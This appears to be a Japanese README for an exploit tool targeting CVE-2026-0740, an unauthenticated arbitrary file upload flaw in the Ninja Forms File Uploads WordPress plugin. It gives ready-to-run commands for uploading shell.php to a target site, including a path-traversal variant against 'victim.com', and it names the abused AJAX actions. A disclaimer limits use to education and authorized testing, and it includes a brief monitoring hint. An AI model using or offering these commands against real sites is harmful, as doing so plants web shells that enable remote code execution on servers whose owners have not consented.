
Ninja Forms File Uploads <= 3.3.26 - 認証不要の任意ファイルアップロード
CVE-2026-0740 は、認証されていない任意のファイルアップロードの脆弱性で、以下に影響します:
Ninja Forms File Uploads ≤ 3.3.26 (WordPress プラグイン)
この欠陥により、攻撃者は認証なしでサーバーに任意のファイルをアップロードでき、リモートコード実行 (RCE) につながる可能性があります。
このプロジェクトは教育目的および許可されたセキュリティテスト目的のみで提供されます。
依存関係のインストール:
pip install httpx httpx-socks
python3 CVE-2026-0740.py -t http://target.com -f shell.php
| 引数 | 説明 |
|---|---|
| -t, --target | ターゲットURL |
| -f, --file | アップロードするファイル |
| -d, --dest | 保存先パス (パストラバーサル) |
| -x, --proxy | SOCKS5 プロキシ |
| -H, --headers | カスタムヘッダー |
| --timeout | リクエストタイムアウト |
| --no-color | 色付き出力を無効化 |
| -q, --quiet | 静音モード |
| --verify-ssl | SSL検証を有効化 |
python3 CVE-2026-0740.py \
-t https://victim.com \
-f shell.php \
-d ../../../../shell.php
admin-ajax.php を介してnonceを要求する/wp-admin/admin-ajax.phpnf_fu_get_new_noncenf_fu_upload/wp-content/uploads/ ディレクトリを監視するこのプロジェクトはMITライセンスの下でライセンスされています。詳細はLICENSEファイルを参照してください。
プルリクエストは歓迎します。大きな変更については、まずイシューを開いて変更内容を議論してください。